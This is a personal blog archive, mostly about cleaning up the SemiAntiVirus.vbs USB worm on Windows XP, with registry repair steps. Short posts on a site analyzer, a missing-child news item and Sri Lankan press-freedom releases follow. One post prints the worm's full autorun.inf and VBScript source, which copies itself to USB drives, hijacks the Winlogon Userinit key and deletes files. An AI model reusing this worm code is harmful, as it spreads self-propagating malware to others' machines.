Clean your system after SemiAntivirus.vbs attack

To get the most out of this post, read the following blog posts first.If you feel you do not understand what the commentators have said, don't worry, I have taken the gist of the comments to write this.

Find out how SemiAntiVirus.vbs has come into your machine and how to delete it

Errors that can be possibly shown after you (or Anti Virus Software) delete SemiAntiVirus.vbs

Read the script of SemiAntiVirus.vbs

and here in this post, I will tell you how to fix the errors

Fixing the Windows Script Host Error which puts up a pop up window at the start up saying "cannot find script file c:windows\system32\semiantivirus.vbs"

Reasons

This happens because the virus is coded to launch with the userinit.exe which manages the start up sequences at the start up.

When the computer boots, userinit.exe is executed and then, it looks for the semiantivirus.vbs to execute. But we (or the anti virus software) have deleted the semiantivirus.vbs in this step.

Since the computer cannot find the semiantivirus.vbs file it displays the above pop up window

So, first, you have to break the link between the userinit.exe and semiantivirus.vbs

Fix

1.Open Registry Editor (Start-->Run-->regedit-->OK)

2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion and select \Winlogon

3. On the right side pane, you will see a long list of entries. Out of them, right click on userinit and select Modify

4.In the Value Data text box, you will see something like C:\WINDOWS\system32\userinit.exe,c:windows\system32\semiantivirus.vbs

5. Modify the value to C:\WINDOWS\system32\userinit.exe and click ok (then, the userinit registry entry should look like this. Look at the status bar for navigation details)

6. Close the registry editor and restart the computer

--OR--

If you like to do it in the command prompt this is the command reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %%SYSTEMROOT%%\System32\userinit.exe, /f

Fixing the Internet Explorer

Reasons
It looks like this because the virus has edited the registry entries for the Title bar and the Home Page

Fix for the Title Bar
1.Open Registry Editor (Start-->Run-->regedit-->OK)

2.Go to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer and select main

3. On the right side pane, you will see a long list of entries. Out of them, right click on Window Title and select Modify

4. Under Value Data, you will see LRI Internet Explorer. Change that to Internet Explorer and click ok

--OR--

If you would like to do it in the command prompt, this is the command reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f


Fix for the Home Page
1. Repeat the 1 and 2 steps of the Fix for the Tiltle Bar

2.On the right side pane, right click on Start Page and select Modify

3. Fill in the Value Data box with the URL of the page that you wish to have as your home page(For example,www.google.lk) and click ok

--OR--

If you would like to do it in the command prompt this is the command reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f

--OR--

Do it simply in the settings of Internet Explorer
1.Go to Tools-->Internet Options-->General-->Home Page

After completing above steps, the registry entry for Internet Explorer should look like this(look at the status bar for navigation details) All the changes would be visible after you restart Internet Explorer

Completing the above steps should remove the implications of the semiantivirus.vbs attack on your computer.

And thank you Shaakunthala, Sadeepa, Isuru and Abish for your valuable comments in earlier posts!!

After effects of removing the SemiAntiVirus.vbs my way

I still did not encounter any problems except this error message at the start up. The file missing is the Virus file which I deleted this way. I do not understand how to fix this. Please help

And the Internet explorer looks like this. The title is changed into LRI Internet Explorer and the Home page is changed into about.blank. keep it touch, answers to all these problems will be in the blog soon PS: I Found out how to fix these two errors. If you are interested in click here

Removing the SemiAntiVirus.vbs file from an infected computer or a USB Drive

I found my own way to remove the the SemiAntiVirus.vbs virus i mentioned in the last post. My computer is running on Windows XP (Service pack 3) platform and therefore, I do not think this will work on any other platform.

Symptoms(As I experienced. If you have more, please add in the comments section)
1. When I click on the shut down button, it logs off and restarts several times. I had to wait until it comes to the welcome screen, and again click on the shut down button to make it really "shut down"
2.The title bar of Internet Explorer was changed into "LRI internet Explorer"(and also, the home page was changed into about.blank)

3.I could not stop a USB drive in order to remove it safely. It says that another programme is using the USB drive but I was sure that no data transfer between the computer and the USB Drive was happening at that time
4.My Folder settings were changed automatically to not to show hidden files and folders.

How to prevent
This is spread through USB drives. This is how the Autorun window and the files in an affected USB drive would look like. If you get a Window like this, click on take no action and OK ( Pavi, sorry I had to tell everybody that I got it from your Pen)
The best way to prevent is to use the Explorer facility in Windows. As I have done above, open my computer, click on Folders and select the USB Drive you want to open from the folders panel. Note that the Auto Run Window says that there is a Program in the USB DRIVE. In reality, it is the virus program. Now, simply select the autorun.inf file and the SemiAntiVirus.vbs and press Shift+Delete. It will remove the virus from the USB Drive. But, if your machine is infected you have to remove it.

NOTE::If you are really interested in knowing about viruses and how do they work,right click on a file and select Open with notepad. then you will get a text like this which explains how does the virus really infect your system

Removing the virus from the computer

It is a simple process. if you have Process Explorer, open it and look for wscript.exe(In my case, it is wscript.exe because the programme creates an object called Wscript.Shell)

If you don't have it download and install from the above link. It is really worth having it on your computer.

Right click on the process and select properties. In the properties window, you can find the actual place where the virus is saved by looking at the path. in my case it is -->c:windows\system32\semiantivirus.vbs


But if you look for the command line, you can see that the process is executing semiantivirus.vbs, which, in another words, the virus file.

(That is why we cannot stop a USB Drive and the The Title bar of IE says LRI Internet explorer. If you look at the code, you will understand it better.)

First kill the wscript.exe process and then go to c:windows\system32\semiantivirus.vbs

Find the semiantivirus.vbs file and delete it permanently (select the file and press Shift+Delete)

There you go!!

Another interesting thing.

Here I found that the WScript.exe is the version of Windows Script Host that enables you to run scripts from Windows.

How ever, Im pretty sure that I deleted the virus file disguised in the name of the original windows WScript file.



So after all,everything is simple..have fun..love you virus!!

PS: If you know any other ways and if you think my way is wrong, please do not be hesitated to comment. I love learning

PS2. Removing the virus file is not enough to get away with it. After removing the file, please continue reading this post to clean up the after effects of the virus attack

Dear SemiAntiVirus.vbs, you are gladly welcome to my machine !

mm well I'm proud to announce that I do not use an anti virus guard or a virus removal tool or anything of that kind. In my computer, it is all about manual virus removal or rather prevention.

But yesterday, I came across this damn thing which does awful things like changing the folder settings. I have set folder settings to show the hidden files, but in few seconds it was changed into do not show hidden files and folders.

soooo, after all, my computer too was infected. It was a quick virus/worm I say. I was trying to format a USB drive and suddenly,it was there!!

Here is the script if any one is interested.


This is the auto run file

[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs

Note: Now you cannot be assured that formatting an affected USB drive is a safe way to get rid of viruses etc. For example, this virus gets into the computer in 5 methods as the above code suggests

1.Opening
2. Using Autoplay feature
3. Exploring(right click and select explore)
4.Searching for the files saved in the USB drive
5. formatting

Interesting!!

The actual virus script which can be found in c:windows\system32\semiantivirus.vbs

To tell the truth, i do not understand a single line of this coding(except the italicized part which has a good sense of humor) but hope it would help the computer geeks in finding a solution

Important: please do not use this information for unethical purposes

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.

'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe

'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************

Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop

crvbs SystemDir,"SemiAntiVirus.vbs"

Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"

Count=Drv.DriveType

Do

delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"
End if
delt Drives.Path,"sxs.exe",false
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 2000
end if


loop while Count<>1


sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)

For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub

sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub

sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if

End sub




i am still tring to find a way to remove this. the vbs file cannot be deleted as it says that it is being used by another program.

mm and the best part is it doesnot allow another AVG to be installed in the machine. i tried to install Avast, but the moment the setup.exe loads, the machine restarts.

cooool, keep in touch, i'll post how to remove it if i find a way.

untill then, have fun!!

PS:: if you know any way to remove this, please you are more than welcome

Analyze the anatomy of your enemy's web site

This is about a site which can analyze any website that you want to. Just enter the web site you want to analyze and hit enter. If you entered my blog address, you might end up with something like this.

I think the tool is quite useful for people who are interested in web designing.

And on the other hand, if people start to use the site's technology for unethical purposes, it would be a curse for the whole world too!!

If you feel like interested, click here to visit the site.

Google search finds missing child

i thought it worth while to share this. this time, it was used for a good purpose. but who knows what will happen this Google tracking technology goes into the hands of terrorists and so forth?







A nine-year-old girl, allegedly kidnapped by her grandmother, has been found using a mobile phone signal and Google Street View.

A police officer and a firefighter in Athol, Massachusetts, joined forces after authorities were alerted that Natalie Maltais had been taken.

Officers used GPS in the girl's mobile phone to find her approximate location.

They fed the co-ordinates into Google Street View, pinpointing a hotel where the child was subsequently found.

The alarm was raised after grandmother Rose Maltais picked up Natalie from the child's legal guardians for what was supposed to be a weekend away.

She "said that she wasn't going to return Natalie and then left the state", Athol police chief Timothy Anderson told the BBC.

The police contacted Ms Maltais, but after she didn't return Natalie as promised, they decided to track them down using Natalie's mobile phone.

Since 2005, US law says that mobile phone providers must be able to locate 67% of callers within 100 metres and 95% of callers within 300 meters.

This requirement has led to GPS capability in most new mobile phones in the US.

"This is very useful, although we can only use it in emergency situations such as when a person is missing or lost, or a life is in danger," said chief Anderson.

Knowing this, police officer Todd Neale contacted the mobile phone provider, AT&T, which gave him GPS coordinates every time the phone was activated. Police must submit a compliance form to the phone provider to request location information.

Source :: BBC

What Tamilnet says about the Sirasa Attack and the Lasantha Wick assasination

Sri Lanka: RSF condemns attack on Tamil-owned TV station

Reporters sans frontiers (RSF), a Paris-based media watchdog, in a press release issued today, condemned the attack on Maharajah Televsions Network (MTV) near Colombo by heavily armed men early morning Tuesday. "Violence and threats against such privately-owned media outlets and journalists trying to impartially report on the conflict must stop," the RSF release said, adding , "[t]he network is one of the country's few, and very popular, independent news sources." Several Sri Lanka Government Ministers and Government owned media have previously charged the network for being not "patriotic" enough in reporting the war between Sri Lanka military and the Liberation Tigers.

Sri Lanka: RSF: Mahinda Rajapakse "directly to blame" for Wickrematunge murder

Expressing outrage over the murder of Sunday Leader editor Lasantha Wickrematunge, Reporters sans frontières (RSF), a Paris-based media watchdog, in a press release issued today, said: "President Mahinda Rajapaksa, his associates and the government media are directly to blame because they incited hatred against him and allowed an outrageous level of impunity to develop as regards violence against the press. Sri Lanka's image is badly sullied by this murder, which is an absolute scandal and must not go unpunished."

It seems that the LTTE is taking the best out of the situation in the country. Just Imagine the picture they create to the world with these head lines.

i took these from the tamilnet RSS feed as the site is not working.